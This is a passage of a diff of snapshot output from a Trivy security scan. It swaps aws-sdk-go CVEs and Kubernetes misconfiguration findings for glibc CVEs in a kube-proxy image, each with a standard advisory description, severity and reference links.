"scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "Possible DoS translating ASN.1 object identifiers", + "name": "glibc: signed comparison vulnerability in the ARMv7 memcpy function", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-2650", + "value": "https://avd.aquasec.com/nvd/cve-2020-6096", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/30/1", + "value": "https://access.redhat.com/security/cve/CVE-2020-6096", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-2650", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6096", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SPYXTDOOB4PQGTYAMZAZNJIB3FF6YQXI/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/URXOIA2LDUKHQXK4BE55BQBRI6ZZG3Y6/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-6096", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://security.gentoo.org/glsa/202101-20", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", + "value": "https://sourceware.org/bugzilla/attachment.cgi?id=12334", }, { "type": "URL", - "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25620", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6119-1", + "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1019", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-2650", + "value": "https://ubuntu.com/security/notices/USN-4954-1", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230530.txt", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-6096", + }, + { + "type": "URL", + "value": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1019", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'usr/local/bin/trivy' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2020-8911", - "installedVersion": "v1.44.245", - "packageName": "github.com/aws/aws-sdk-go", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3326", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://access.redhat.com/security/cve/CVE-2020-8911", - "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", - "https://bugzilla.redhat.com/show_bug.cgi?id=1869800", - "https://github.com/advisories/GHSA-f5pg-7wfw-84q9", - "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", - "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", - "https://github.com/aws/aws-sdk-go/pull/3403", - "https://github.com/google/security-research/security/advisories/GHSA-f5pg-7wfw-84q9", - "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", - "https://nvd.nist.gov/vuln/detail/CVE-2020-8911", - "https://pkg.go.dev/vuln/GO-2022-0646", - "https://www.cve.org/CVERecord?id=CVE-2020-8911", + "http://www.openwall.com/lists/oss-security/2021/01/28/2", + "https://access.redhat.com/security/cve/CVE-2021-3326", + "https://bugs.chromium.org/p/project-zero/issues/detail?id=2146", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3326", + "https://linux.oracle.com/cve/CVE-2021-3326.html", + "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3326", + "https://security.gentoo.org/glsa/202107-07", + "https://security.netapp.com/advisory/ntap-20210304-0007/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=27256", + "https://sourceware.org/git/?p=glibc.git;a=commit;h=7d88c6142c6efc160c0ee5e4f85cde382c072888", + "https://sourceware.org/pipermail/libc-alpha/2021-January/122058.html", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5699-1", + "https://www.cve.org/CVERecord?id=CVE-2021-3326", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujan2022.html", ], }, "category": "Vulnerability", - "description": "A padding oracle vulnerability exists in the AWS S3 Crypto SDK for GoLang versions prior to V2. The SDK allows users to encrypt files with AES-CBC without computing a Message Authentication Code (MAC), which then allows an attacker who has write access to the target's S3 bucket and can observe whether or not an endpoint with access to the key can decrypt a file, they can reconstruct the plaintext with (on average) 128*length (plaintext) queries to the endpoint, by exploiting CBC's ability to manipulate the bytes of the next block and PKCS5 padding errors. It is recommended to update your SDK to V2 or later, and re-encrypt your files.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", + "description": "The iconv function in the GNU C Library (aka glibc or libc6) 2.32 and earlier, when processing invalid input sequences in the ISO-2022-JP-3 encoding, fails an assertion in the code path and aborts the program, potentially resulting in a denial of service.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "aws/aws-sdk-go: CBC padding oracle issue in AWS S3 Crypto SDK for golang", + "name": "glibc: Assertion failure in ISO-2022-JP-3 gconv module related to combining characters", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-8911", + "value": "https://avd.aquasec.com/nvd/cve-2021-3326", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-8911", + "value": "http://www.openwall.com/lists/oss-security/2021/01/28/2", }, { "type": "URL", - "value": "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", + "value": "https://access.redhat.com/security/cve/CVE-2021-3326", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1869800", + "value": "https://bugs.chromium.org/p/project-zero/issues/detail?id=2146", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-f5pg-7wfw-84q9", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3326", }, { "type": "URL", - "value": "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", + "value": "https://linux.oracle.com/cve/CVE-2021-3326.html", }, { "type": "URL", - "value": "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", + "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", }, { "type": "URL", - "value": "https://github.com/aws/aws-sdk-go/pull/3403", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://github.com/google/security-research/security/advisories/GHSA-f5pg-7wfw-84q9", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3326", }, { "type": "URL", - "value": "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", + "value": "https://security.gentoo.org/glsa/202107-07", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-8911", + "value": "https://security.netapp.com/advisory/ntap-20210304-0007/", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0646", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27256", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-8911", + "value": "https://sourceware.org/git/?p=glibc.git;a=commit;h=7d88c6142c6efc160c0ee5e4f85cde382c072888", + }, + { + "type": "URL", + "value": "https://sourceware.org/pipermail/libc-alpha/2021-January/122058.html", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5310-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5699-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3326", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpujan2022.html", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'usr/local/bin/trivy' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2020-8912", - "installedVersion": "v1.44.245", - "packageName": "github.com/aws/aws-sdk-go", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3999", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://access.redhat.com/security/cve/CVE-2020-8912", - "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", - "https://bugzilla.redhat.com/show_bug.cgi?id=1869801", - "https://github.com/advisories/GHSA-7f33-f4f5-xwgw", - "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", - "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", - "https://github.com/aws/aws-sdk-go/pull/3403", - "https://github.com/google/security-research/security/advisories/GHSA-7f33-f4f5-xwgw", - "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", - "https://nvd.nist.gov/vuln/detail/CVE-2020-8912", - "https://pkg.go.dev/vuln/GO-2022-0646", - "https://www.cve.org/CVERecord?id=CVE-2020-8912", + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", + "https://access.redhat.com/security/cve/CVE-2021-3999", + "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", + "https://linux.oracle.com/cve/CVE-2021-3999.html", + "https://linux.oracle.com/errata/ELSA-2022-9234.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", + "https://security-tracker.debian.org/tracker/CVE-2021-3999", + "https://security.netapp.com/advisory/ntap-20221104-0001/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", + "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5310-2", + "https://www.cve.org/CVERecord?id=CVE-2021-3999", + "https://www.openwall.com/lists/oss-security/2022/01/24/4", ], }, "category": "Vulnerability", - "description": "A vulnerability in the in-band key negotiation exists in the AWS S3 Crypto SDK for GoLang versions prior to V2. An attacker with write access to the targeted bucket can change the encryption algorithm of an object in the bucket, which can then allow them to change AES-GCM to AES-CTR. Using this in combination with a decryption oracle can reveal the authentication key used by AES-GCM as decrypting the GMAC tag leaves the authentication key recoverable as an algebraic equation. It is recommended to update your SDK to V2 or later, and re-encrypt your files.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", + "description": "A flaw was found in glibc. An off-by-one buffer overflow and underflow in getcwd() may lead to memory corruption when the size of the buffer is exactly 1. A local attacker who can control the input buffer and size passed to getcwd() in a setuid program could use this flaw to potentially execute arbitrary code and escalate their privileges on the system.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "aws-sdk-go: In-band key negotiation issue in AWS S3 Crypto SDK for golang", + "name": "glibc: Off-by-one buffer overflow/underflow in getcwd()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-8912", + "value": "https://avd.aquasec.com/nvd/cve-2021-3999", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-8912", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", }, { "type": "URL", - "value": "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", + "value": "https://access.redhat.com/security/cve/CVE-2021-3999", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1869801", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-7f33-f4f5-xwgw", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", }, { "type": "URL", - "value": "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", + "value": "https://linux.oracle.com/cve/CVE-2021-3999.html", }, { "type": "URL", - "value": "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", + "value": "https://linux.oracle.com/errata/ELSA-2022-9234.html", }, { "type": "URL", - "value": "https://github.com/aws/aws-sdk-go/pull/3403", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://github.com/google/security-research/security/advisories/GHSA-7f33-f4f5-xwgw", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", }, { "type": "URL", - "value": "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", + "value": "https://security-tracker.debian.org/tracker/CVE-2021-3999", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-8912", + "value": "https://security.netapp.com/advisory/ntap-20221104-0001/", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0646", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-8912", + "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV011", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv011", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", - "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", - "name": "CPU not limited(Container 'trivy' of Job 'scan-trivy-k8s-kvmnm' should set 'resources.limits.cpu')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv011", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "https://ubuntu.com/security/notices/USN-5310-2", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV012", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv012", - ], - }, - "category": "Misconfiguration", - "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", - "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", - "name": "Runs as root user(Container 'trivy' of Job 'scan-trivy-k8s-kvmnm' should set 'securityContext.runAsNonRoot' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv012", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3999", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://www.openwall.com/lists/oss-security/2022/01/24/4", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV014", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2016-10228", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", - "https://avd.aquasec.com/misconfig/ksv014", + "http://openwall.com/lists/oss-security/2017/03/01/10", + "http://www.securityfocus.com/bid/96525", + "https://access.redhat.com/security/cve/CVE-2016-10228", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10228", + "https://linux.oracle.com/cve/CVE-2016-10228.html", + "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2016-10228", + "https://security.gentoo.org/glsa/202101-20", + "https://sourceware.org/bugzilla/show_bug.cgi?id=19519", + "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", + "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5768-1", + "https://www.cve.org/CVERecord?id=CVE-2016-10228", + "https://www.oracle.com/security-alerts/cpuapr2022.html", ], }, - "category": "Misconfiguration", - "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", - "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", - "name": "Root file system is not read-only(Container 'trivy' of Job 'scan-trivy-k8s-kvmnm' should set 'securityContext.readOnlyRootFilesystem' to true)", + "category": "Vulnerability", + "description": "The iconv program in the GNU C Library (aka glibc or libc6) 2.31 and earlier, when invoked with multiple suffixes in the destination encoding (TRANSLATE or IGNORE) along with the -c option, enters an infinite loop when processing invalid multi-byte input sequences, leading to a denial of service.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: iconv program can hang when invoked with the -c option", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv014", + "value": "https://avd.aquasec.com/nvd/cve-2016-10228", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "value": "http://openwall.com/lists/oss-security/2017/03/01/10", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV015", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv015", - ], - }, - "category": "Misconfiguration", - "description": "When containers have resource requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", - "mitigation": "Set 'containers[].resources.requests.cpu'.", - "name": "CPU requests not specified(Container 'trivy' of Job 'scan-trivy-k8s-kvmnm' should set 'resources.requests.cpu')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv015", + "value": "http://www.securityfocus.com/bid/96525", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "https://access.redhat.com/security/cve/CVE-2016-10228", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV016", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv016", - ], - }, - "category": "Misconfiguration", - "description": "When containers have memory requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", - "mitigation": "Set 'containers[].resources.requests.memory'.", - "name": "Memory requests not specified(Container 'trivy' of Job 'scan-trivy-k8s-kvmnm' should set 'resources.requests.memory')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv016", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10228", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://linux.oracle.com/cve/CVE-2016-10228.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV018", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv018", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing memory limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", - "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", - "name": "Memory not limited(Container 'trivy' of Job 'scan-trivy-k8s-kvmnm' should set 'resources.limits.memory')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv018", + "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + }, + { + "type": "URL", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2016-10228", + }, + { + "type": "URL", + "value": "https://security.gentoo.org/glsa/202101-20", + }, + { + "type": "URL", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519", + }, + { + "type": "URL", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", + }, + { + "type": "URL", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV020", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv020", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", - "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", - "name": "Runs with low user ID(Container 'lurker' of Job 'scan-trivy-k8s-kvmnm' should set 'securityContext.runAsUser' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv020", + "value": "https://ubuntu.com/security/notices/USN-5768-1", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://www.cve.org/CVERecord?id=CVE-2016-10228", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV020", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-25013", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv020", + "https://access.redhat.com/security/cve/CVE-2019-25013", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-25013", + "https://linux.oracle.com/cve/CVE-2019-25013.html", + "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "https://lists.apache.org/thread.html/r32d767ac804e9b8aad4355bb85960a6a1385eab7afff549a5e98660f@%3Cjira.kafka.apache.org%3E", + "https://lists.apache.org/thread.html/r448bb851cc8e6e3f93f3c28c70032b37062625d81214744474ac49e7@%3Cdev.kafka.apache.org%3E", + "https://lists.apache.org/thread.html/r4806a391091e082bdea17266452ca656ebc176e51bb3932733b3a0a2@%3Cjira.kafka.apache.org%3E", + "https://lists.apache.org/thread.html/r499e4f96d0b5109ef083f2feccd33c51650c1b7d7068aa3bd47efca9@%3Cjira.kafka.apache.org%3E", + "https://lists.apache.org/thread.html/r5af4430421bb6f9973294691a7904bbd260937e9eef96b20556f43ff@%3Cjira.kafka.apache.org%3E", + "https://lists.apache.org/thread.html/r750eee18542bc02bd8350861c424ee60a9b9b225568fa09436a37ece@%3Cissues.zookeeper.apache.org%3E", + "https://lists.apache.org/thread.html/r7a2e94adfe0a2f0a1d42e4927e8c32ecac97d37db9cb68095fe9ddbc@%3Cdev.zookeeper.apache.org%3E", + "https://lists.apache.org/thread.html/rd2354f9ccce41e494fbadcbc5ad87218de6ec0fff8a7b54c8462226c@%3Cissues.zookeeper.apache.org%3E", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4Y6TX47P47KABSFOL26FLDNVCWXDKDEZ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TVCUNLQ3HXGS4VPUQKWTJGRAW2KTFGXS/", + "https://nvd.nist.gov/vuln/detail/CVE-2019-25013", + "https://security.gentoo.org/glsa/202107-07", + "https://security.netapp.com/advisory/ntap-20210205-0004/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=24973", + "https://sourceware.org/git/?p=glibc.git;a=commit;h=ee7a3144c9922808181009b7b3e50e852fb4999b", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5768-1", + "https://www.cve.org/CVERecord?id=CVE-2019-25013", + "https://www.oracle.com/security-alerts/cpuapr2022.html", ], }, - "category": "Misconfiguration", - "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", - "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", - "name": "Runs with low user ID(Container 'trivy' of Job 'scan-trivy-k8s-kvmnm' should set 'securityContext.runAsUser' > 10000)", + "category": "Vulnerability", + "description": "The iconv feature in the GNU C Library (aka glibc or libc6) through 2.32, when processing invalid multi-byte input sequences in the EUC-KR encoding, may have a buffer over-read.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: buffer over-read in iconv when processing invalid multi-byte input sequences in the EUC-KR encoding", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv020", + "value": "https://avd.aquasec.com/nvd/cve-2019-25013", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://access.redhat.com/security/cve/CVE-2019-25013", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV021", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv021", - ], - }, - "category": "Misconfiguration", 